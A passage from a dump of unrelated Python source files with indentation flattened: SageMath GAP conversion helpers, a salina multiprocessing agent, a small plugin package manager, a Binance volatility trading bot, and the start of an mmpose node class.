sage: F = GF(13, 'a')
sage: F(x)
2
sage: F(gap('0*Z(13)'))
0
sage: F = GF(13^2, 'a')
sage: x = gap('Z(13)')
sage: F(x)
2
sage: x = gap('Z(13^2)^3')
sage: F(x)
12*a + 11
sage: F.multiplicative_generator()^3
12*a + 11
TESTS:
Check that :trac:`18048` is fixed::
sage: K.<a> = GF(16)
sage: b = a^2 + a
sage: K(b._gap_())
a^2 + a
AUTHOR:
- David Joyner and William Stein
"""
s = str(x)
if s[:2] == '0*':
return F(0)
i1 = s.index("(")
i2 = s.index(")")
q = eval(s[i1+1:i2].replace('^','**'))
if not F.cardinality().is_power_of(q):
raise ValueError('%r has no subfield of size %r' % (F, q))
if s.find(')^') == -1:
e = 1
else:
e = int(s[i2+2:])
if F.degree() == 1:
g = F(gap.eval('Int(Z(%s))' % q))
elif F.is_conway():
f = (F.cardinality() - 1) // (q - 1)
g = F.multiplicative_generator() ** f
else:
raise ValueError('%r is not prime or defined by a Conway polynomial' % F)
return g**e
def intmod_gap_to_sage(x):
r"""
INPUT:
- x -- Gap integer mod ring element
EXAMPLES::
sage: a = gap(Mod(3, 18)); a
ZmodnZObj( 3, 18 )
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
3
sage: b.parent()
Ring of integers modulo 18
sage: a = gap(Mod(3, 17)); a
Z(17)
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
3
sage: b.parent()
Finite Field of size 17
sage: a = gap(Mod(0, 17)); a
0*Z(17)
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
0
sage: b.parent()
Finite Field of size 17
sage: a = gap(Mod(3, 65537)); a
ZmodpZObj( 3, 65537 )
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
3
sage: b.parent()
Ring of integers modulo 65537
"""
from sage.rings.finite_rings.all import FiniteField
from sage.rings.finite_rings.integer_mod import Mod
from sage.rings.integer import Integer
s = str(x)
m = re.search(r'Z\(([0-9]*)\)', s)
if m:
return gfq_gap_to_sage(x, FiniteField(Integer(m.group(1))))
m = re.match(r'Zmod[np]ZObj\( ([0-9]*), ([0-9]*) \)', s)
if m:
return Mod(Integer(m.group(1)), Integer(m.group(2)))
raise ValueError("Unable to convert Gap element '%s'" % s)
#############
gap = Gap()
def reduce_load_GAP():
"""
Returns the GAP interface object defined in sage.interfaces.gap.
EXAMPLES::
sage: from sage.interfaces.gap import reduce_load_GAP
sage: reduce_load_GAP()
Gap
"""
return gap
def gap_console():
"""
Spawn a new GAP command-line session.
Note that in gap-4.5.7 you cannot use a workspace cache that had
no commandline to restore a gap session with commandline.
EXAMPLES::
sage: gap_console() # not tested
********* GAP, Version 4.5.7 of 14-Dec-2012 (free software, GPL)
* GAP * http://www.gap-system.org
********* Architecture: x86_64-unknown-linux-gnu-gcc-default64
Libs used: gmp, readline
Loading the library and packages ...
Packages: GAPDoc 1.5.1
Try '?help' for help. See also '?copyright' and '?authors'
gap>
TESTS::
sage: import subprocess as sp
sage: from sage.interfaces.gap import gap_command
sage: cmd = 'echo "quit;" | ' + gap_command(use_workspace_cache=False)[0]
sage: gap_startup = sp.check_output(cmd, shell=True, # py2
....: stderr=sp.STDOUT)
sage: gap_startup = sp.check_output(cmd, shell=True, # py3
....: stderr=sp.STDOUT,
....: encoding='latin1')
sage: 'www.gap-system.org' in gap_startup
True
sage: 'Error' not in gap_startup
True
sage: 'sorry' not in gap_startup
True
"""
from sage.repl.rich_output.display_manager import get_display_manager
if not get_display_manager().is_in_terminal():
raise RuntimeError('Can use the console only in the terminal. Try %%gap magics instead.')
cmd, _ = gap_command(use_workspace_cache=False)
cmd += ' ' + os.path.join(SAGE_EXTCODE,'gap','console.g')
os.system(cmd)
|
remote.py
|
#
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import copy
import time
import torch
import torch.multiprocessing as mp
from salina import Agent
from salina.workspace import Workspace, _SplitSharedWorkspace
def f(agent, in_queue, out_queue, seed):
"""The function that is executed in a single process"""
out_queue.put("ok")
running = True
old_workspace = None
print("Seeding remote agent with ", seed)
agent.seed(seed)
while running:
command = in_queue.get()
if command[0] == "go_new_workspace":
_, workspace, kwargs = command
old_workspace = workspace
agent(workspace, **kwargs)
out_queue.put("ok")
elif command[0] == "go_reuse_workspace":
_, _, kwargs = command
agent(old_workspace, **kwargs)
out_queue.put("ok")
elif command[0] == "exit":
out_queue.put("ok")
return
elif command[0] == "eval_mode":
agent.eval()
out_queue.put("ok")
elif command[0] == "train_mode":
agent.train()
out_queue.put("ok")
class RemoteAgent(Agent):
"""It corresponds to an agent that is executed in another process
Args:
Agent ([salina.Agent]): the agent ot execute in another process
"""
def __init__(self, agent, name=None):
super().__init__(name=name)
self.agent = agent
self._is_running = False
self.process = None
self.last_workspace = None
self.train_mode = True
def get_by_name(self, n):
if self._name == n:
return [self] + self.agent.get_by_name(n)
else:
return self.agent.get_by_name(n)
def forward(self, **kwargs):
raise NotImplementedError
def _create_process(self):
print("[RemoteAgent] starting process...")
self.i_queue = mp.Queue()
self.o_queue = mp.Queue()
self.i_queue.cancel_join_thread()
self.o_queue.cancel_join_thread()
self.process = mp.Process(
target=f, args=(self.agent, self.i_queue, self.o_queue, self._seed)
)
self.process.daemon = False
self.process.start()
r = self.o_queue.get()
def __call__(self, workspace, **kwargs):
with torch.no_grad():
assert (
workspace.is_shared
), "You must use a shared workspace when using a Remote Agent"
if self.process is None:
self._create_process()
self.train(self.train_mode)
if not workspace == self.last_workspace:
self.i_queue.put(("go_new_workspace", workspace, kwargs))
self.last_workspace = workspace
r = self.o_queue.get()
assert r == "ok"
else:
self.i_queue.put(("go_reuse_workspace", workspace, kwargs))
r = self.o_queue.get()
assert r == "ok"
def _asynchronous_call(self, workspace, **kwargs):
"""Non-blocking forward. To use together with `is_running`"""
with torch.no_grad():
self._is_running = True
assert (
workspace.is_shared
), "You must use a shared workspace when using a Remote Agent"
if self.process is None:
self._create_process()
if not workspace == self.last_workspace:
self.i_queue.put(("go_new_workspace", workspace, kwargs))
self.last_workspace = workspace
else:
self.i_queue.put(("go_reuse_workspace", workspace, kwargs))
def train(self, f=True):
self.train_mode = f
if self.process is None:
return
if f:
self.i_queue.put(("train_mode"))
a = self.o_queue.get()
assert a == "ok"
else:
self.eval()
def eval(self):
self.train_mode = False
if self.process is None:
return
self.i_queue.put(("eval_mode"))
a = self.o_queue.get()
assert a == "ok"
def seed(self, _seed):
self._seed = _seed
def _running_queue(self):
return self.o_queue
def is_running(self):
if self._is_running:
try:
r = self.o_queue.get(False)
assert r == "ok"
self._is_running = False
except:
pass
return self._is_running
def close(self):
if self.process is None:
return
print("[RemoteAgent] closing process")
self.i_queue.put(("exit",))
self.o_queue.get()
time.sleep(0.1)
self.process.terminate()
self.process.join()
self.i_queue.close()
self.o_queue.close()
time.sleep(0.1)
del self.i_queue
del self.o_queue
self.process = None
def __del__(self):
self.close()
class NRemoteAgent(Agent):
"""Multiple agents executed in different processes. Use the NRemoteAgent.create function to create such an agent"""
def __init__(self, agents, batch_dims):
super().__init__()
self.agents = agents
self.batch_dims = batch_dims
def get_by_name(self, name):
r = []
if self._name == name:
r = [self]
for a in self.agents:
r = r + a.get_by_name(name)
return r
@staticmethod
def create(agent, num_processes=0, time_size=None, **extra_kwargs):
"""Returns a NRemote agent with num_processes copies of agent in different processes
Also returns the specific workspace to use with such an agent
Args:
agent ([salina.Agent]): The agent to execute in multiple processes
num_processes (int, optional): Number of processes to create. If 0, then no processes are created (for debugging). Defaults to 0.
time_size ([type], optional): If specified, it forces the created Workspace to have this particular time_size. Defaults to None.
Returns:
[salina.Agent,salina.SharedWorkspace]: The NRemoteAgent and the corresponding workspace
"""
agent.seed(0)
if num_processes == 0:
workspace = Workspace()
_agent = copy.deepcopy(agent)
agent(workspace, **extra_kwargs)
shared_workspace = workspace._convert_to_shared_workspace(
n_repeat=1, time_size=time_size
)
return _agent, shared_workspace
workspace = Workspace()
agents = [copy.deepcopy(agent) for t in range(num_processes)]
agent(workspace, **extra_kwargs)
b = workspace.batch_size()
batch_dims = [(k * b, k * b + b) for k, a in enumerate(agents)]
shared_workspace = workspace._convert_to_shared_workspace(
n_repeat=num_processes, time_size=time_size
)
agents = [RemoteAgent(a) for a in agents]
return NRemoteAgent(agents, batch_dims), shared_workspace
def __call__(self, workspace, **kwargs):
assert workspace.is_shared
for k in range(len(self.agents)):
_workspace = _SplitSharedWorkspace(workspace, self.batch_dims[k])
self.agents[k]._asynchronous_call(_workspace, **kwargs)
for a in self.agents:
ok = a._running_queue().get()
assert ok == "ok"
def seed(self, seed, inc=1):
s = seed
for a in self.agents:
a.seed(s)
s += inc
def _asynchronous_call(self, workspace, **kwargs):
assert workspace.is_shared
for k in range(len(self.agents)):
_workspace = _SplitSharedWorkspace(workspace, self.batch_dims[k])
self.agents[k]._asynchronous_call(_workspace, **kwargs)
def is_running(self):
for a in self.agents:
if a.is_running():
return True
return False
def train(self, f=True):
for a in self.agents:
a.train(f)
def eval(self):
for a in self.agents:
a.eval()
|
archive.py
|
from . import patients
def archive_cli(args):
if args.by_patient:
return patients.archive_by_patient_cli(args)
raise ValueError("No archive type chosen")
# import lzma
# import multiprocessing
# import pathlib
# import shutil
# import socket
# from datetime import datetime
# MINUTES_OF_DATA = 5
# ICOM_HZ = 4
# SECONDS_OF_DATA = MINUTES_OF_DATA * 60
# BATCH = int(ICOM_HZ * SECONDS_OF_DATA)
# # timestamp = datetime.now().strftime("%Y%m%d_%H%M%S_%f")
# # filename = f"{ip}_{timestamp}"
# # temp_path = live_dir.joinpath(f"{filename}.txt")
# # shutil.move(live_path, temp_path)
# # compressed_path = compressed_dir.joinpath(f"{filename}.xz")
# # multiprocessing.Process(
# # target=compress_and_move_data, args=(temp_path, compressed_path)
# # ).start()
# # multiprocessing.Process(
# # target=compress_and_move_data, args=(live_path, compressed_path)
# # ).start()
# def compress_and_move_data(input_file, output_file):
# input_file = pathlib.Path(input_file)
# output_file = pathlib.Path(output_file)
# with open(input_file, "rb") as in_file:
# with lzma.open(output_file, "w") as out_file:
# out_file.write(in_file.read())
# input_file.unlink()
|
commands.py
|
"""
Some console-friendly methods are exposed in pkg.*, and defined at pkg.commands.
"""
import re
import threading
from .config import g
from .package import LocalPackage
from .repo import Repository
from .vendor import semantic_version
__all__ = ['install', 'remove', 'local', 'remote', 'refresh', 'upgrade']
def _parse_spec(spec):
match = re.match(r"^([a-zA-Z0-9\-][a-zA-Z0-9_\-]{3,214})(.*)$", spec)
name = match.group(1)
version = match.group(2).strip()
# Validate spec by parsing it
version = '*' if not version else version
semantic_version.Spec(version)
return name, version
def install(spec, repo=None, upgrade=False):
"""
Download and install a package from specified repository.
See :meth:`install_from_repo`.
:param spec: `name==version`, or just `name` only.
:type spec: str
:param repo: URL of the repository. Default: :code:`g['repos']`
:type repo: list(str) or None
:param upgrade: Upgrade when already installed if True.
"""
name, version = _parse_spec(spec)
def _install_from_repositories(repos):
pkg = remote(name, repos)
if pkg is None:
raise Exception('Package not found in all repositories: %r' % name)
pkg.install(upgrade)
if repo is None:
repo = g['repos']
t = threading.Thread(target=_install_from_repositories, args=(repo,))
t.start()
return t
def remove(name):
"""
Remove a package locally (LocalPackage.remove).
"""
pkg = LocalPackage.by_name(name)
if pkg:
return pkg.remove()
def local(name):
"""
Find an installed package (LocalPackage.by_name).
:returns: None if package is not found, else LocalPackage instance.
:rtype: LocalPackage
"""
return LocalPackage.by_name(name)
def remote(name, repo=None):
"""
Find a remote package from given repos.
:param name: Name of the package
:param repo: URL of the repository. Default: :code:`g['repos']`
:type repo: list(str) or None
:returns: None if package is not found, else InstallablePackage instance.
:rtype: InstallablePackage
"""
if repo is None:
repo = g['repos']
for _repo in repo:
pkg = Repository.from_url(_repo).get(name)
if pkg is None:
continue
else:
return pkg
return None
def refresh():
"""
Rescan and load available plugins.
"""
for pkg in LocalPackage.all():
pkg.load()
return True
def upgrade(spec, repo=None):
"""
Upgrade specified package. (:code:`pkg.install(spec, repo, upgrade=True)`)
:param spec: `name==version`, or just `name` only.
:param repo: target repository to download.
:type spec: str
"""
return install(spec, repo, upgrade=True)
|
Binance Detect Moonings.py
|
"""
Disclaimer
All investment strategies and investments involve risk of loss.
Nothing contained in this program, scripts, code or repositoy should be
construed as investment advice.Any reference to an investment's past or
potential performance is not, and should not be construed as, a recommendation
or as a guarantee of any specific outcome or profit.
By using this program you accept all liabilities,
and that no claims can be made against the developers,
or others connected with the program.
"""
# use for environment variables
import os
# use if needed to pass args to external modules
import sys
# used to create threads & dynamic loading of modules
import threading
import importlib
# used for directory handling
import glob
# Needed for colorful console output Install with: python3 -m pip install colorama (Mac/Linux) or pip install colorama (PC)
from colorama import init
init()
# needed for the binance API / websockets / Exception handling
from binance.client import Client
from binance.exceptions import BinanceAPIException
# used for dates
from datetime import date, datetime, timedelta
import time
# used to repeatedly execute the code
from itertools import count
# used to store trades and sell assets
import json
# Load helper modules
from helpers.parameters import (
parse_args, load_config
)
# Load creds modules
from helpers.handle_creds import (
load_correct_creds, test_api_key
)
# for colourful logging to the console
class txcolors:
BUY = '\033[92m'
WARNING = '\033[93m'
SELL_LOSS = '\033[91m'
SELL_PROFIT = '\033[32m'
DIM = '\033[2m\033[35m'
DEFAULT = '\033[39m'
# tracks profit/loss each session
global session_profit
session_profit = 0
# print with timestamps
old_out = sys.stdout
class St_ampe_dOut:
"""Stamped stdout."""
nl = True
def write(self, x):
"""Write function overloaded."""
if x == '\n':
old_out.write(x)
self.nl = True
elif self.nl:
old_out.write(f'{txcolors.DIM}[{str(datetime.now().replace(microsecond=0))}]{txcolors.DEFAULT} {x}')
self.nl = False
else:
old_out.write(x)
def flush(self):
pass
sys.stdout = St_ampe_dOut()
def get_price(add_to_historical=True):
'''Return the current price for all coins on binance'''
global historical_prices, hsp_head
initial_price = {}
prices = client.get_all_tickers()
for coin in prices:
if CUSTOM_LIST:
if any(item + PAIR_WITH == coin['symbol'] for item in tickers) and all(item not in coin['symbol'] for item in FIATS):
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
else:
if PAIR_WITH in coin['symbol'] and all(item not in coin['symbol'] for item in FIATS):
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
if add_to_historical:
hsp_head += 1
if hsp_head == RECHECK_INTERVAL:
hsp_head = 0
historical_prices[hsp_head] = initial_price
return initial_price
def wait_for_price():
'''calls the initial price and ensures the correct amount of time has passed
before reading the current price again'''
global historical_prices, hsp_head, volatility_cooloff
volatile_coins = {}
externals = {}
coins_up = 0
coins_down = 0
coins_unchanged = 0
pause_bot()
if historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'] > datetime.now() - timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)):
# sleep for exactly the amount of time required
time.sleep((timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)) - (datetime.now() - historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'])).total_seconds())
print(f'Working...Session profit:{session_profit:.2f}% Est:${(QUANTITY * session_profit)/100:.2f}')
# retreive latest prices
get_price()
# calculate the difference in prices
for coin in historical_prices[hsp_head]:
# minimum and maximum prices over time period
min_price = min(historical_prices, key = lambda x: float("inf") if x is None else float(x[coin]['price']))
max_price = max(historical_prices, key = lambda x: -1 if x is None else float(x[coin]['price']))
threshold_check = (-1.0 if min_price[coin]['time'] > max_price[coin]['time'] else 1.0) * (float(max_price[coin]['price']) - float(min_price[coin]['price'])) / float(min_price[coin]['price']) * 100
# each coin with higher gains than our CHANGE_IN_PRICE is added to the volatile_coins dict if less than MAX_COINS is not reached.
if threshold_check > CHANGE_IN_PRICE:
coins_up +=1
if coin not in volatility_cooloff:
volatility_cooloff[coin] = datetime.now() - timedelta(minutes=TIME_DIFFERENCE)
# only include coin as volatile if it hasn't been picked up in the last TIME_DIFFERENCE minutes already
if datetime.now() >= volatility_cooloff[coin] + timedelta(minutes=TIME_DIFFERENCE):
volatility_cooloff[coin] = datetime.now()
if len(coins_bought) + len(volatile_coins) < MAX_COINS or MAX_COINS == 0:
volatile_coins[coin] = round(threshold_check, 3)
print(f'{coin} has gained {volatile_coins[coin]}% within the last {TIME_DIFFERENCE} minutes, calculating volume in {PAIR_WITH}')
else:
print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but you are holding max number of coins{txcolors.DEFAULT}')
elif threshold_check < CHANGE_IN_PRICE:
coins_down +=1
else:
coins_unchanged +=1
# Disabled until fix
#print(f'Up: {coins_up} Down: {coins_down} Unchanged: {coins_unchanged}')
# Here goes new code for external signalling
externals = external_signals()
exnumber = 0
for excoin in externals:
if excoin not in volatile_coins and excoin not in coins_bought and (len(coins_bought) + exnumber) < MAX_COINS:
volatile_coins[excoin] = 1
exnumber +=1
print(f'External signal received on {excoin}, calculating volume in {PAIR_WITH}')
return volatile_coins, len(volatile_coins), historical_prices[hsp_head]
def external_signals():
external_list = {}
signals = {}
# check directory and load pairs from files into external_list
signals = glob.glob("signals/*.exs")
for filename in signals:
for line in open(filename):
symbol = line.strip()
external_list[symbol] = symbol
try:
os.remove(filename)
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file{txcolors.DEFAULT}')
return external_list
def pause_bot():
'''Pause the script when exeternal indicators detect a bearish trend in the market'''
global bot_paused, session_profit, hsp_head
# start counting for how long the bot's been paused
start_time = time.perf_counter()
while os.path.isfile("signals/paused.exc"):
if bot_paused == False:
print(f'{txcolors.WARNING}Pausing buying due to change in market conditions, stop loss and take profit will continue to work...{txcolors.DEFAULT}')
bot_paused = True
# Sell function needs to work even while paused
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
get_price(True)
# pausing here
if hsp_head == 1: print(f'Paused...Session profit:{session_profit:.2f}% Est:${(QUANTITY * session_profit)/100:.2f}')
time.sleep((TIME_DIFFERENCE * 60) / RECHECK_INTERVAL)
else:
# stop counting the pause time
stop_time = time.perf_counter()
time_elapsed = timedelta(seconds=int(stop_time-start_time))
# resume the bot and ser pause_bot to False
if bot_paused == True:
print(f'{txcolors.WARNING}Resuming buying due to change in market conditions, total sleep time: {time_elapsed}{txcolors.DEFAULT}')
bot_paused = False
return
def convert_volume():
'''Converts the volume given in QUANTITY from USDT to the each coin's volume'''
volatile_coins, number_of_coins, last_price = wait_for_price()
lot_size = {}
volume = {}
for coin in volatile_coins:
# Find the correct step size for each coin
# max accuracy for BTC for example is 6 decimal points
# while XRP is only 1
try:
info = client.get_symbol_info(coin)
step_size = info['filters'][2]['stepSize']
lot_size[coin] = step_size.index('1') - 1
if lot_size[coin] < 0:
lot_size[coin] = 0
except:
pass
# calculate the volume in coin from QUANTITY in USDT (default)
volume[coin] = float(QUANTITY / float(last_price[coin]['price']))
# define the volume with the correct step size
if coin not in lot_size:
volume[coin] = float('{:.1f}'.format(volume[coin]))
else:
# if lot size has 0 decimal points, make the volume an integer
if lot_size[coin] == 0:
volume[coin] = int(volume[coin])
else:
volume[coin] = float('{:.{}f}'.format(volume[coin], lot_size[coin]))
return volume, last_price
def buy():
'''Place Buy market orders for each volatile coin found'''
volume, last_price = convert_volume()
orders = {}
for coin in volume:
# only buy if the there are no active trades on the coin
if coin not in coins_bought:
print(f"{txcolors.BUY}Preparing to buy {volume[coin]} {coin}{txcolors.DEFAULT}")
if TEST_MODE:
orders[coin] = [{
'symbol': coin,
'orderId': 0,
'time': datetime.now().timestamp()
}]
# Log trade
if LOG_TRADES:
write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}")
continue
# try to create a real order if the test orders did not raise an exception
try:
buy_limit = client.create_order(
symbol = coin,
side = 'BUY',
type = 'MARKET',
quantity = volume[coin]
)
# error handling here in case position cannot be placed
except Exception as e:
print(e)
# run the else block if the position has been placed and return order info
else:
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
# binance sometimes returns an empty list, the code will wait here until binance returns the order
while orders[coin] == []:
print('Binance is being slow in returning the order, calling the API again...')
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
time.sleep(1)
else:
print('Order returned, saving order to file')
# Log trade
if LOG_TRADES:
write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}")
else:
print(f'Signal detected, but there is already an active trade on {coin}')
return orders, last_price, volume
def sell_coins():
'''sell coins that have reached the STOP LOSS or TAKE PROFIT threshold'''
global hsp_head, session_profit
last_price = get_price(False) # don't populate rolling window
#last_price = get_price(add_to_historical=True) # don't populate rolling window
coins_sold = {}
for coin in list(coins_bought):
# define stop loss and take profit
TP = float(coins_bought[coin]['bought_at']) + (float(coins_bought[coin]['bought_at']) * coins_bought[coin]['take_profit']) / 100
SL = float(coins_bought[coin]['bought_at']) + (float(coins_bought[coin]['bought_at']) * coins_bought[coin]['stop_loss']) / 100
LastPrice = float(last_price[coin]['price'])
BuyPrice = float(coins_bought[coin]['bought_at'])
PriceChange = float((LastPrice - BuyPrice) / BuyPrice * 100)
# check that the price is above the take profit and readjust SL and TP accordingly if trialing stop loss used
if LastPrice > TP and USE_TRAILING_STOP_LOSS:
# increasing TP by TRAILING_TAKE_PROFIT (essentially next time to readjust SL)
coins_bought[coin]['take_profit'] = PriceChange + TRAILING_TAKE_PROFIT
coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] - TRAILING_STOP_LOSS
if DEBUG: print(f"{coin} TP reached, adjusting TP {coins_bought[coin]['take_profit']:.2f} and SL {coins_bought[coin]['stop_loss']:.2f} accordingly to lock-in profit")
continue
# check that the price is below the stop loss or above take profit (if trailing stop loss not used) and sell if this is the case
if LastPrice < SL or LastPrice > TP and not USE_TRAILING_STOP_LOSS:
print(f"{txcolors.SELL_PROFIT if PriceChange >= 0. else txcolors.SELL_LOSS}TP or SL reached, selling {coins_bought[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} : {PriceChange-(TRADING_FEE*2):.2f}% Est:${(QUANTITY*(PriceChange-(TRADING_FEE*2)))/100:.2f}{txcolors.DEFAULT}")
# try to create a real order
try:
if not TEST_MODE:
sell_coins_limit = client.create_order(
symbol = coin,
side = 'SELL',
type = 'MARKET',
quantity = coins_bought[coin]['volume']
)
# error handling here in case position cannot be placed
except Exception as e:
print(e)
# run the else block if coin has been sold and create a dict for each coin sold
else:
coins_sold[coin] = coins_bought[coin]
# prevent system from buying this coin for the next TIME_DIFFERENCE minutes
volatility_cooloff[coin] = datetime.now()
# Log trade
if LOG_TRADES:
profit = ((LastPrice - BuyPrice) * coins_sold[coin]['volume'])* (1-(TRADING_FEE*2)) # adjust for trading fee here
write_log(f"Sell: {coins_sold[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} Profit: {profit:.2f} {PriceChange-(TRADING_FEE*2):.2f}%")
session_profit=session_profit + (PriceChange-(TRADING_FEE*2))
continue
# no action; print once every TIME_DIFFERENCE
if hsp_head == 1:
if len(coins_bought) > 0:
print(f'TP or SL not yet reached, not selling {coin} for now {BuyPrice} - {LastPrice} : {txcolors.SELL_PROFIT if PriceChange >= 0. else txcolors.SELL_LOSS}{PriceChange-(TRADING_FEE*2):.2f}% Est:${(QUANTITY*(PriceChange-(TRADING_FEE*2)))/100:.2f}{txcolors.DEFAULT}')
if hsp_head == 1 and len(coins_bought) == 0: print(f'Not holding any coins')
return coins_sold
def update_portfolio(orders, last_price, volume):
'''add every coin bought to our portfolio for tracking/selling later'''
if DEBUG: print(orders)
for coin in orders:
coins_bought[coin] = {
'symbol': orders[coin][0]['symbol'],
'orderid': orders[coin][0]['orderId'],
'timestamp': orders[coin][0]['time'],
'bought_at': last_price[coin]['price'],
'volume': volume[coin],
'stop_loss': -STOP_LOSS,
'take_profit': TAKE_PROFIT,
}
# save the coins in a json file in the same directory
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
print(f'Order with id {orders[coin][0]["orderId"]} placed and saved to file')
def remove_from_portfolio(coins_sold):
'''Remove coins sold due to SL or TP from portfolio'''
for coin in coins_sold:
coins_bought.pop(coin)
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
def write_log(logline):
timestamp = datetime.now().strftime("%d/%m %H:%M:%S")
with open(LOG_FILE,'a+') as f:
f.write(timestamp + ' ' + logline + '\n')
if __name__ == '__main__':
# Load arguments then parse settings
args = parse_args()
mymodule = {}
# set to false at Start
global bot_paused
bot_paused = False
DEFAULT_CONFIG_FILE = 'config.yml'
DEFAULT_CREDS_FILE = 'creds.yml'
config_file = args.config if args.config else DEFAULT_CONFIG_FILE
creds_file = args.creds if args.creds else DEFAULT_CREDS_FILE
parsed_config = load_config(config_file)
parsed_creds = load_config(creds_file)
# Default no debugging
DEBUG = False
# Load system vars
TEST_MODE = parsed_config['script_options']['TEST_MODE']
LOG_TRADES = parsed_config['script_options'].get('LOG_TRADES')
LOG_FILE = parsed_config['script_options'].get('LOG_FILE')
DEBUG_SETTING = parsed_config['script_options'].get('DEBUG')
AMERICAN_USER = parsed_config['script_options'].get('AMERICAN_USER')
# Load trading vars
PAIR_WITH = parsed_config['trading_options']['PAIR_WITH']
QUANTITY = parsed_config['trading_options']['QUANTITY']
MAX_COINS = parsed_config['trading_options']['MAX_COINS']
FIATS = parsed_config['trading_options']['FIATS']
TIME_DIFFERENCE = parsed_config['trading_options']['TIME_DIFFERENCE']
RECHECK_INTERVAL = parsed_config['trading_options']['RECHECK_INTERVAL']
CHANGE_IN_PRICE = parsed_config['trading_options']['CHANGE_IN_PRICE']
STOP_LOSS = parsed_config['trading_options']['STOP_LOSS']
TAKE_PROFIT = parsed_config['trading_options']['TAKE_PROFIT']
CUSTOM_LIST = parsed_config['trading_options']['CUSTOM_LIST']
TICKERS_LIST = parsed_config['trading_options']['TICKERS_LIST']
USE_TRAILING_STOP_LOSS = parsed_config['trading_options']['USE_TRAILING_STOP_LOSS']
TRAILING_STOP_LOSS = parsed_config['trading_options']['TRAILING_STOP_LOSS']
TRAILING_TAKE_PROFIT = parsed_config['trading_options']['TRAILING_TAKE_PROFIT']
TRADING_FEE = parsed_config['trading_options']['TRADING_FEE']
SIGNALLING_MODULES = parsed_config['trading_options']['SIGNALLING_MODULES']
if DEBUG_SETTING or args.debug:
DEBUG = True
# Load creds for correct environment
access_key, secret_key = load_correct_creds(parsed_creds)
if DEBUG:
print(f'loaded config below\n{json.dumps(parsed_config, indent=4)}')
print(f'Your credentials have been loaded from {creds_file}')
# Authenticate with the client, Ensure API key is good before continuing
if AMERICAN_USER:
client = Client(access_key, secret_key, tld='us')
else:
client = Client(access_key, secret_key)
# If the users has a bad / incorrect API key.
# this will stop the script from starting, and display a helpful error.
api_ready, msg = test_api_key(client, BinanceAPIException)
if api_ready is not True:
exit(f'{txcolors.SELL_LOSS}{msg}{txcolors.DEFAULT}')
# Use CUSTOM_LIST symbols if CUSTOM_LIST is set to True
if CUSTOM_LIST: tickers=[line.strip() for line in open(TICKERS_LIST)]
# try to load all the coins bought by the bot if the file exists and is not empty
coins_bought = {}
# path to the saved coins_bought file
coins_bought_file_path = 'coins_bought.json'
# rolling window of prices; cyclical queue
historical_prices = [None] * (TIME_DIFFERENCE * RECHECK_INTERVAL)
hsp_head = -1
# prevent including a coin in volatile_coins if it has already appeared there less than TIME_DIFFERENCE minutes ago
volatility_cooloff = {}
# use separate files for testing and live trading
if TEST_MODE:
coins_bought_file_path = 'test_' + coins_bought_file_path
# if saved coins_bought json file exists and it's not empty then load it
if os.path.isfile(coins_bought_file_path) and os.stat(coins_bought_file_path).st_size!= 0:
with open(coins_bought_file_path) as file:
coins_bought = json.load(file)
print('Press Ctrl-Q to stop the script')
if not TEST_MODE:
if not args.notimeout: # if notimeout skip this (fast for dev tests)
print('WARNING: You are using the Mainnet and live funds. Waiting 30 seconds as a security measure')
time.sleep(30)
signals = glob.glob("signals/*.exs")
for filename in signals:
for line in open(filename):
try:
os.remove(filename)
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file {filename}{txcolors.DEFAULT}')
if os.path.isfile("signals/paused.exc"):
try:
os.remove("signals/paused.exc")
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file {filename}{txcolors.DEFAULT}')
# load signalling modules
try:
if len(SIGNALLING_MODULES) > 0:
for module in SIGNALLING_MODULES:
print(f'Starting {module}')
mymodule[module] = importlib.import_module(module)
t = threading.Thread(target=mymodule[module].do_work, args=())
t.daemon = True
t.start()
time.sleep(2)
else:
print(f'No modules to load {SIGNALLING_MODULES}')
except Exception as e:
print(e)
# seed initial prices
get_price()
while True:
orders, last_price, volume = buy()
update_portfolio(orders, last_price, volume)
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
|
node.py
|
# Copyright (c) OpenMMLab. All rights reserved.
import logging
import time
from abc import ABCMeta, abstractmethod
from dataclasses import dataclass
from queue import Empty
from threading import Thread
from typing import Callable, Dict, List, Optional, Tuple, Union
from mmcv.utils.misc import is_method_overridden
from mmpose.utils import StopWatch
from ..utils import Message, VideoEndingMessage, limit_max_fps
@dataclass
class BufferInfo():
"""Dataclass for buffer information."""
buffer_name: str
input_name: Optional[str] = None
trigger: bool = False
@dataclass
class EventInfo():
"""Dataclass for event handler information."""
event_name: str
is_keyboard: bool = False
handler_func: Optional[Callable] = None
class Node(Thread, metaclass=ABCMeta):
"""Base interface of functional module.
Parameters:
name (str, optional): The node name (also thread name).
enable_key (str|int, optional): Set a hot-key to toggle enable/disable
of the node. If an int value is given, it will be treated as an
ascii code of a key. Please note:
1. If enable_key is set, the bypass method need to be
overridden to define the node behavior when disabled
2. Some hot-key has been use for particular use. For example:
'q', 'Q' and 27 are used for quit
Default: None
